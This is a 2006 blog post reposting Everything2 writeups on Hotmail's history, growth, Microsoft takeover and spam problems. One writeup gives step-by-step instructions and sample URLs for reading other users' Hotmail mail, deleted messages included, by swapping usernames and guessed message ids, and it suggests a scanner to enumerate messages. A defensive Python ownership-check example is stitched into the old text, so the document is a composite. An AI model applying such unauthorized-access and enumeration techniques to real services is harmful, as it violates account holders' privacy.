Saturday, September 09, 2006

Hotmail history and crack attempts

What is below is a result of my being a member of a support forum? The history of Hotmail and many crack attempts and even many more I find interesting and at the same time boring; anyway, whoever copy-pasted this to me did at least something good.

I claim no authority and integrity - do I have to claim that? I don't think this is all against the Blogger.com TOC; if it is, please let me know.

Hotmail
(thing) by DaVinciLe0 (5.9 mon), Wed Mar 29 2000 at 13:01:23

Hotmail was originally named HoTMaiL, referring to the fact that it was
email on the web, in HTML. It was a good idea (though not the first) and
very successful. The company sold out to Microsoft a few years back, leaving
its employees in pretty favorable financial status. Nowadays its best use
is as a patsy when filling in email fields on forms at sites you know will
spam you.

(thing) by giantfish (2.2 y), 1 C!, Tue Feb 27 2001 at 2:05:38

Hotmail (Internet, software): A free Web-based e-mail service now owned by
Microsoft Corporation. A fine example of viral marketing. It grew its
subscriber base from zero to 12 million users in only 18 months - faster
than any other company in any industry in history, and with a budget of only
$50,000. It did so by including "P.S. I love you. Get your free email at
http://www.hotmail.com/" at the bottom of every email sent. Later it was
changed to be less endorsing by removing "P.S. I love you." Hotmail became
the largest e-mail provider in countries like Sweden and India, without any
marketing there.

Today there are many Hotmail clones but it is still popular as a free e-mail
provider.

(thing) by jaggederest (4.8 y), 1 C!, Mon Aug 20 2001 at 22:53:49


Has recently been broken/cracked. There's a very major backdoor exploit that
allows anyone with a hotmail account to read any message that has ever been
sent, even those which were deleted and emptied from the trash.
Here's the instructions, from a user on
http://www.slashdot.org, gol64738:


---= Three Steps To View Someone's Emails In Hotmail (rev.2) =---
(Tested with Internet Explorer 5)

To view full email from someone else's account do the following:

1. Login normally to Hotmail with your ID (any id)

2. Use this type of link to view specific message from specific user:

http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_
lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fc
gi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e
22%26start%3d1%26len%3d9999999999999999%26raw%3d0%
26login%3dusername%26domain%3dhotmail%2ecom&hm___f
l=attrd&domain=hotmail.com or
http://lw14fd.law14.hotmail.msn.com/cgi-bin/saferd
?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2
fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%
2e22%26start%3d1%26len%3d9999999999999999%26raw%3d
0%26login%3dusername%26domain%3dhotmail%2ecom&hm__
_fl=attrd&domain=hotmail.com

From that link change values:
MSG943322803%2e16 (Message id number, it's simply a counter. %2e is escaped
code for ".")
username (Hotmail account name to view)

MSG number examples: MSG943322803%2e1 , MSG943322803%2e22 ,
MSG943322803%2e149

(remove "%26raw%3d0" if you want to view email as 'emailbox view', instead
of full raw view.)
(remove "&hm___fl=attrd&domain=hotmail.com" if you don't like the hotmail
frame on top.)

Note: You need to have both numbers correct and that username must have the
message to make this link work.

Note: All those "%2e" etc. are hexadecimal ascii codes. You need to use them
instead of true characters.

See here for full list:
http://www.december.com/html/spec/ascii.html

3. Done. If you entered correct message number & that user has it you will
see it. :)
(Test it with your own other hotmail account messages first to get the idea
working.)

---= ideas and comments for improved viewing / scan =---

Now typing those message numbers manually is too much work, you could create
a small utility to automatically scan given range of messages from specific
user name.
(You need to build it to work with IE, as you must be logged in hotmail when
you want to view messages..)

It also helps to know that from the message numbers in your own hotmail
inbox, you can see about what time which message number was used, e.g.:

MSG998289581.0 arrived on 20.08.2001
MSG997936971.27 arrived on 16.08.2001.
MSG996698372.27 arrived on 01.08.2001.
MSG975960863.0 arrived on 04.12.2000.

So you don't need to scan as many message addresses when you know from which
range you are looking at.

Test messages: (Login to hotmail,then use links to view message from my test
account)

raw format view: (can copy base64 encoded files too:)
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_
lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fc
gi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e
22%26start%3d9702%26len%3d9687%26raw%3d0%26disk%3d
64%2e4%2e36%2e68_d1577%26login%3djokutesti99%26dom
ain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.com

email box view: (can see any attached images directly etc.:)
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_
lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fc
gi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e
22%26start%3d9702%26len%3d9687%26disk%3d64%2e4%2e3
6%2e68_d1577%26login%3djokutesti99%26domain%3dhotm
ail%2ecom&hm___fl=attrd&domain=hotmail.com

*Side note on deleting messages in Hotmail:
-You can also see the message even if it's deleted! If you delete a message
in hotmail, and also empty trashcan, the message is still viewable using
this type of link.
At least for 6-12hrs or something.

---=.... Status / Feedback / Fixes / Questions .....---

Changes on the link:

Remove parameter:

%26disk%3d64%2e4%2e36%2e68_d1577
It caused Hotmail error page in some cases:
"Due to an internal error your request cannot be processed.
We apologize for the inconvenience. Please try again later."
Solution:
Remove that parameter from the link. It's not required.

Changed parameters:
%26start%3d9702%26len%3d9687
in to:
%26start%3d1%26len%3d9999999999999999
That is just the start & length to display, of the email. If you put too
small value for len it should display only up to that amount of
characters(?).

*
If the user doesn't have the message you will get error:
"
Subject: Unable to locate message
Content-Type: text/plain; charset=us-ascii
An error has prevented from locating the message."

*
Questions:
Q1. How do i get to know which message number the user has?

A1. You cannot. You just have to guess them..one by one.
Yes, it could mean scanning thousands/millions of messages just to see
something. (slow it is)

Q2. I've sent a test message to my other account but cannot see it?
And i can still see your test messages, but not my own?

A2. Check again that your MSG number is correct, both X and Y.
(MSGXXXXXXXXX.YYY)
The Y value can be between 0-nnn. (I haven't seen bigger than 150)
Check that the link is correct.
Check that you are logged in to Hotmail.
Also try changing the server, from "pv2fd.pav2.hotmail" to
"lw14fd.law14.hotmail". If you can see the test account messages then hotmail
hasn't been fixed yet.

Q3. The hobo scanner program doesn't work?
I get some "Path not found (76)" error?

A3. True in most cases.. :)
It has more bugs than microsoft products i guess.
It's confirmed that it works at least on win95. (latest version is hobo rev.2)
On WinNT it works but it doesn't save the scans..(bug in activating the
webwindow..)
Create the output directory yourself, that fixes the path error.

Q4. Where/How can i find this exploit link myself?

A4. 1. Go to your hotmail preferences page.
2. Go to Mail Display Settings.
3. Set option 'Message Headers' to 'Advanced'.
4. Press ok to save settings.
5. View some email, you will see full message header.
6. Click 'View E-mail Message Source'.
7. Done. It opens a new window with this exploitable link,
you can remove some useless parameters from the
link and send this link to a friend for testing
if they can see your message.

*
No reply or confirmation from Hotmail so far.
The exploit still works. Already almost 3 days since reporting it to
Hotmail..(today is 20.08.2001)

The automated reply from the hotmail security problem submission page gave this
type of message..:p

"...Hotmail is a secure site and uses an intrusion alert that allows only
one IP address to gain access to a mailbox at a time. If anyone tries to
access your e-mail when your account is open, he or she is returned to the
sign-in page. Hotmail uses state-of-the-art software and firewall protection
to offer our members the highest security...."
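
The writeup above describes a request in which the mailbox (`login`) and message id (`msg`) travel percent-encoded inside `hm___qs` and are honoured for any logged-in account. The following is an added example, not part of the original writeups and not Hotmail's code: it decodes that nested parameter, applies the ownership check that blocks such a read, and flags cross-account requests in a log. The sample users, message ids and log lines are constructed, and it assumes the session user comes from server-side session state.

```python
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed request template in the shape of the links quoted above:
# the real parameters travel percent-encoded inside hm___qs.
TEMPLATE = ("/cgi-bin/saferd?_lang=EN&hm___qs=%26msg%3d{msg}%26start%3d1"
            "%26raw%3d0%26login%3d{login}%26domain%3dhotmail%2ecom&hm___fl=attrd")

# Constructed log: (authenticated session user, requested URL).
LOG = [
    ("alice", TEMPLATE.format(msg="MSG1000000001%2e0", login="alice")),
    ("bob",   TEMPLATE.format(msg="MSG1000000001%2e1", login="alice")),
    ("bob",   TEMPLATE.format(msg="MSG1000000001%2e2", login="alice")),
]

def inner_params(url):
    """Decode the nested hm___qs value into a flat dict."""
    outer = parse_qs(urlsplit(url).query)
    inner = parse_qs(outer.get("hm___qs", [""])[0])
    return {key: values[0] for key, values in inner.items()}

def is_authorized(session_user, url):
    """Ownership check: the mailbox named in the request must be the session's own.
    Assumes session_user comes from server-side session state, never from the URL."""
    login = inner_params(url).get("login")
    return login is not None and login.lower() == session_user.lower()

def flag_cross_account(log):
    """Return {session_user: {(foreign login, msg id), ...}} for foreign-mailbox requests."""
    hits = defaultdict(set)
    for session_user, url in log:
        params = inner_params(url)
        if "login" in params and not is_authorized(session_user, url):
            hits[session_user].add((params["login"], params.get("msg")))
    return dict(hits)

if __name__ == "__main__":
    for user, targets in flag_cross_account(LOG).items():
        print(user, "requested", len(targets), "message(s) from another mailbox:",
              sorted(targets))
```

A session that walks many sequential `msg` values for a `login` that is not its own is the pattern the "scan a range" idea above would leave in the logs.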






(thing) by fondue (38.1 min), Wed Jan 30 2002 at 22:49:06


HotMail is a seriously wack web mail service owned by Microsoft, and used by
them as bait to assimilate unwitting souls into the .NET Passport programme.
It has recently (in the last year or two) been rebranded MSN Hotmail and
decked out in livery stolen from Sun's Forte for Java development
environment. Hotmail is notoriously insecure, and has been cracked in
spectacular fashion at least once (see above writeups). A Hotmail account is
also a magnet for spam, some of it from Microsoft themselves (which you
can't block).
Hotmail subjects you to between one and five centre-page advertisements
before you can view your inbox, and after you perform any operation.
Microsoft also use Hotmail as a crutch for their demonstrably inferior IM
software, MSN Messenger, which is otherwise incapable of retaining offline
messages.

I personally use Netscape's WebMail instead of Hotmail, mainly because it's
less graphics-heavy, and doesn't print your password in plain text in its
redirect URL. (You mean you didn't notice that...?) Hotmail's terms of use
are pretty fucking hairy as well. It is probably a bad idea to correspond
with the Patent Office via Hotmail.


(thing) by SharQ (1.9 d), 3 C!s, Tue Aug 27 2002 at 16:01:33


Hotmail - the internet "killer app" that went down in flames


Why Hotmail became so popular

Hotmail was started as a free web-based e-mail service in 1996. It was not
the first, not the best, not the fastest, not the easiest to use and not the
most innovative service, but it quickly grew to become the biggest and most
popular nonetheless.

1996 was well before the internet boom, and only very few people had
internet access at home. However, libraries and universities had long
offered its users access through Arpanet and other networks, and when the
Internet seemed to be the new standard, it made sense to offer Internet to
the users as well.

If you are familiar with internet email standards, you know that the POP
standard pretty much requires you to store all your email on one particular
computer, because the mailbox otherwise fills up really fast. The problem
was - as mentioned - that not many people had their own computers hooked up
to the internet.

The Internet grew big because of two killer apps; The world wide web (which
most people, sadly, know as "the internet") and email. Later irc and other
chat services, along with Napster and other file sharing services became the
main killer apps, but email was always the key.

So - everybody wants an email address they can check at their local library,
at their universities and schools, or at the other locations offering free
(or at least cheap) internet access. Because most of these locations offered
the web rather than email, web email seemed like a fabulous idea.

So, several services started to offer free email. Among these were WhoWhere,
iName, Four11 and Hotmail. The common denominator of these services was
that they were free, offered reasonable privacy, and they were available
from any computer hooked up to the internet.

The Hotmail service was supported by advertising sales, and - quickly
afterwards - by offering free newsletters to their users. To deliver these
newsletters to the mailboxes, the service provider would take some money
from the newsletter, which in turn was supported by advertising.

Quickly, hundreds of websites wanting a piece of the cake spawned. Strictly
speaking, the technical level behind the email services is low - all you
need is a huge web server (or a server cluster, rather) with a front-end
(the nice-looking, user-friendly web page) and a secure database backend
(accessing the pop, imap or proprietary protocol mailboxes), and you were
good to go earn lots of money.

The reason why these types of email services were popular among advertisers
was that the users had to register. This means that you could get a fairly
exact picture of the demography of the users, thereby allowing for
specifically targeted marketing.

In short: The users were happy because they got free email, the provider was
happy because the advertisers gave them lots of money, and the advertisers
were happy because they finally got a wet dream coming true: They knew
exactly who watched their ads.

Things start going wrong

In 1998, Microsoft (who earlier had shrugged off the Internet as a waste of
time) was eager to get into the market, and decided to go for the biggest
provider there was - Hotmail. Per 1st November 1998, Microsoft was
officially the owner of Hotmail and the 9 million (!) mailboxes that existed
on the Hotmail servers. The geek population was in distress.

Either because they were working on their strategy plans, or because
Microsoft just did not know what to actually do with Hotmail, they left it
alone for a while. Nothing changed, except for a small Microsoft logo
showing up every here and there.

Well.. Almost.

Almost at the same time that Microsoft took over Hotmail, reports (and
experiences) started showing up in the media of a dramatic increase in spam
to Hotmail accounts. I am not saying that these emails came from Microsoft,
but the rumours of Microsoft releasing email lists - against good money, of
course - seem to make sense. At the same time, the service starts to "lose"
emails into nothingness - mail that is sent does not arrive, and mail that
is sent to a Hotmail mailbox vanishes into thin air. To my knowledge,
neither Hotmail nor Microsoft has ever made an official statement on this
phenomenon.

2002: Mo money, mo Hotmail.

In 2002, Hotmail has become MSN Hotmail, and has gotten a "nice" glossy
design which (surprise, surprise) matches Microsoft's Windows XP design. At
the same time, MSN announces that their POP service (the ability to get POP
mailbox messages to your Hotmail inbox for free) would be a pay-only
service. At the same time, Microsoft starts bombarding your message inbox
with - yes - spam. As it were, Hotmail has become a free web based email
with a limit of 2 MB per mailbox. If you want more storage space, you'll
have to pay, and Microsoft loves to remind you of this service.

Usually, if you only get text-only emails, this 2 MB limit is more than
enough. However, this is not the case when we talk about Hotmail, because of
the massive amounts of spam that come crashing into your mailbox. If a
mailbox is not cleaned out every 4-5 days or so, it will be "full", and you
will not get any emails - the mails are bounced back to the sender.

But - kind as they are - Microsoft also offers a solution to the problem:
Become a premium member! For only £19.99 per year, you can get the massive
storage space of 10 MB, along with the ability to check your POP email, to
prevent your account from expiring, virus scanning, and the possibility to
receive emails with attachments of 1.5 MB.

Considering that you for the same price could set up your own domain, with
about 10 mailboxes of 10 MB each, you do get the feeling that Microsoft is
ripping you off.

Add this to the hacking scandal (see an earlier node) and the fact that
Hotmail has become even more unreliable, the only conclusion must be that
Hotmail - despite having meant a lot to a lot of people - has lost its touch
rather severely.

Hotmail, Rest in Peace.

 
